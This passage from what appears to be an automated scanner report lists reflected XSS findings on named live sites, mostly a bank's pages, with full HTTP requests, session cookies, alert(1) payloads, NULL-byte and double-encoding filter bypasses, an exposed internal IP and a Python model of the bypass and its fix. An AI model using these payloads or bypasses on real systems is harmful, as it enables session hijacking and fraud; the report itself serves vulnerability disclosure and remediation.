The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007a93d"><script>alert(1)</script>a2f88c48136 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a93d"><script>alert(1)</script>a2f88c48136 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/about/privacyandsecurity/completeclientprotection/default.html?%007a93d"><script>alert(1)</script>a2f88c48136=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:35 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 30854
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   

       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
           
...[SNIP]...
<a href="/bbt/about/privacyandsecurity/completeclientprotection/default.html?page=print&%007a93d"><script>alert(1)</script>a2f88c48136=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

1.445. http://www.bbt.com/bbt/careers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/careers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0012a7a"><script>alert(1)</script>5fb5315ccee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12a7a"><script>alert(1)</script>5fb5315ccee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/careers/?%0012a7a"><script>alert(1)</script>5fb5315ccee=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:51 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 33957
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

       
   <title>Car
...[SNIP]...
<a href="/bbt/careers/default.html?page=print&%0012a7a"><script>alert(1)</script>5fb5315ccee=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

1.446. http://www.bbt.com/bbt/mobile/mobile-product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/mobile/mobile-product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9529"><script>alert(1)</script>45d303da152 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9529"><script>alert(1)</script>45d303da152 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/mobile/mobile-product.html?%00f9529"><script>alert(1)</script>45d303da152=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:30 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 30271
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
                   
...[SNIP]...
<a href="/bbt/mobile/mobile-product.html?page=print&%00f9529"><script>alert(1)</script>45d303da152=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

1.447. http://www.bbt.com/bbt/personal/products/checkcard/default.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/personal/products/checkcard/default.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0055e59"><script>alert(1)</script>759ab4bcd91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 55e59"><script>alert(1)</script>759ab4bcd91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/personal/products/checkcard/default.html?%0055e59"><script>alert(1)</script>759ab4bcd91=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:33 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 31030
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
...[SNIP]...
<a href="/bbt/personal/products/checkcard/default.html?page=print&%0055e59"><script>alert(1)</script>759ab4bcd91=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

1.448. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/personal/products/onlinebanking/default.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006f039"><script>alert(1)</script>d7e45a2b9d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f039"><script>alert(1)</script>d7e45a2b9d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/personal/products/onlinebanking/default.html?%006f039"><script>alert(1)</script>d7e45a2b9d5=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:39 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 35938
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
               
...[SNIP]...
<a href="/bbt/personal/products/onlinebanking/default.html?page=print&%006f039"><script>alert(1)</script>d7e45a2b9d5=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

1.449. http://www.bbt.com/bbt/sitemap.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009f75f"><script>alert(1)</script>ddf7c1767f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f75f"><script>alert(1)</script>ddf7c1767f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/sitemap.html?%009f75f"><script>alert(1)</script>ddf7c1767f3=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:59 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 32253
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
...[SNIP]...
<a href="/bbt/sitemap.html?page=print&%009f75f"><script>alert(1)</script>ddf7c1767f3=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

1.450. https://www.bbt.com/images/chat/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bbt.com
Path:   /images/chat/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a1daf"><script>alert(1)</script>1641a099e6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a1daf"><script>alert(1)</script>1641a099e6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /images/chat/?%00a1daf"><script>alert(1)</script>1641a099e6e=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:33 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 207
cache-control: private
x-powered-by: ASP.NET
Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)


               <html><head><meta http-equiv="refresh" content="0;url=http://www.bbt.com/errors/403-14.asp?403;http://172.30.10.46:80/images/chat/?%00a1daf"><script>alert(1)</script>1641a099e6e=1"></head></html
...[SNIP]...

1.451. https://www.bbt.com/images/chat/oao-matrix/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bbt.com
Path:   /images/chat/oao-matrix/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00de7c6"><script>alert(1)</script>3830aed06ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de7c6"><script>alert(1)</script>3830aed06ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /images/chat/oao-matrix/?%00de7c6"><script>alert(1)</script>3830aed06ac=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:34 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 218
cache-control: private
x-powered-by: ASP.NET
Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)


               <html><head><meta http-equiv="refresh" content="0;url=http://www.bbt.com/errors/403-14.asp?403;http://172.30.10.46:80/images/chat/oao-matrix/?%00de7c6"><script>alert(1)</script>3830aed06ac=1"></
...[SNIP]...

1.452. https://www.bbt.com/images/chat/oao/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bbt.com
Path:   /images/chat/oao/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fd8c7"><script>alert(1)</script>c4970a877ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fd8c7"><script>alert(1)</script>c4970a877ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /images/chat/oao/?%00fd8c7"><script>alert(1)</script>c4970a877ed=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:35 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 211
cache-control: private
x-powered-by: ASP.NET
Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)


               <html><head><meta http-equiv="refresh" content="0;url=http://www.bbt.com/errors/403-14.asp?403;http://172.30.10.46:80/images/chat/oao/?%00fd8c7"><script>alert(1)</script>c4970a877ed=1"></head></
...[SNIP]...

1.453. https://www.bbt.com/images/chat/vcsp/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bbt.com
Path:   /images/chat/vcsp/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ae575"><script>alert(1)</script>447eca9d97b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae575"><script>alert(1)</script>447eca9d97b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /images/chat/vcsp/?%00ae575"><script>alert(1)</script>447eca9d97b=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:39 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 212
cache-control: private
x-powered-by: ASP.NET
Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)


               <html><head><meta http-equiv="refresh" content="0;url=http://www.bbt.com/errors/403-14.asp?403;http://172.30.10.46:80/images/chat/vcsp/?%00ae575"><script>alert(1)</script>447eca9d97b=1"></head><
...[SNIP]...
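
The NULL-byte bypass reported in 1.445 through 1.453 works because the filter and the application disagree about where the input ends: the filter URL-decodes the query string and inspects it as a NUL-terminated string, so everything after the decoded %00 is invisible to it, while the ASP.NET page copies the raw, still-encoded query string straight into a double-quoted href (1.445 to 1.449) or into a meta refresh content attribute (1.450 to 1.453, whose error redirect also exposes the internal address 172.30.10.46 in the response). The following Python model is an added illustration, not code from the scanner, from BB&T or from any WAF product: the signature list, the C-string helper and the link builders are hypothetical stand-ins for the undisclosed components, and the query string is the one captured in finding 1.445. It also shows the fix the remediation text asks for, encoding the reflected value for the attribute context instead of relying on the filter.

```python
import html
from urllib.parse import unquote_to_bytes

# Raw query string from the request in finding 1.445, copied from the report.
RAW_QUERY = '%0012a7a"><script>alert(1)</script>5fb5315ccee=1'

# Hypothetical signature list standing in for whatever the real filter blocks.
BLOCKED = ('<script', 'javascript:', 'onclick=')


def c_string(data: bytes) -> bytes:
    """Model a NUL-terminated C string: bytes after the first 0x00 do not exist."""
    nul = data.find(b'\x00')
    return data if nul < 0 else data[:nul]


def waf_blocks_native(raw_query: str) -> bool:
    """Simulated native-code filter: URL-decode, then scan the copy as a C string.
    The decoded %00 becomes 0x00 and truncates the inspected copy to nothing."""
    decoded = c_string(unquote_to_bytes(raw_query)).lower()
    return any(sig.encode() in decoded for sig in BLOCKED)


def waf_blocks_fixed(raw_query: str) -> bool:
    """Length-aware inspection: every decoded byte is scanned, NUL included."""
    decoded = unquote_to_bytes(raw_query).lower()
    return any(sig.encode() in decoded for sig in BLOCKED)


def print_link_vulnerable(path: str, raw_query: str) -> str:
    """Reproduces the sink visible in the responses: the raw query string is
    concatenated into a double-quoted href with no output encoding at all."""
    return (f'<a href="{path}?page=print&{raw_query}" '
            f'onclick="NewWindow(this.href,\'product\',\'650\',\'500\',\'yes\');return false;">')


def print_link_safe(path: str, raw_query: str) -> str:
    """Same link, with the untrusted fragment HTML-attribute-encoded. The payload
    still reaches the page, but as inert text inside the attribute value."""
    safe_query = html.escape(raw_query, quote=True)
    return (f'<a href="{path}?page=print&amp;{safe_query}" '
            f'onclick="NewWindow(this.href,\'product\',\'650\',\'500\',\'yes\');return false;">')
```

A quick way to confirm the bypass during a test is to submit the same payload twice, once with and once without the leading %00: if the filter blocks the second request but not the first, the inspected copy is being truncated, and the fix belongs in the page's output encoding rather than in the filter's rule set.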

1.454. http://www.brothercake.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brothercake.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 350fe"><script>alert(1)</script>79cd7322848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 350fe\"><script>alert(1)</script>79cd7322848 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?350fe"><script>alert(1)</script>79cd7322848=1 HTTP/1.1
Host: www.brothercake.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:22:32 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Cache-control: private
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=3f722a0b27bbf1e02a7a38b563ec2988; path=/
Connection: close
Content-Type: text/html
Content-Length: 20228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta http
...[SNIP]...
<form id="stylesForm" action="/?350fe\"><script>alert(1)</script>79cd7322848=1" method="post">
...[SNIP]...

1.455. http://www.local.com/dart/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 629be%2527%253balert%25281%2529%252f%252f3d8ca4cb923 was submitted in the cat parameter. This input was echoed as 629be';alert(1)//3d8ca4cb923 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the cat request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services629be%2527%253balert%25281%2529%252f%252f3d8ca4cb923&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
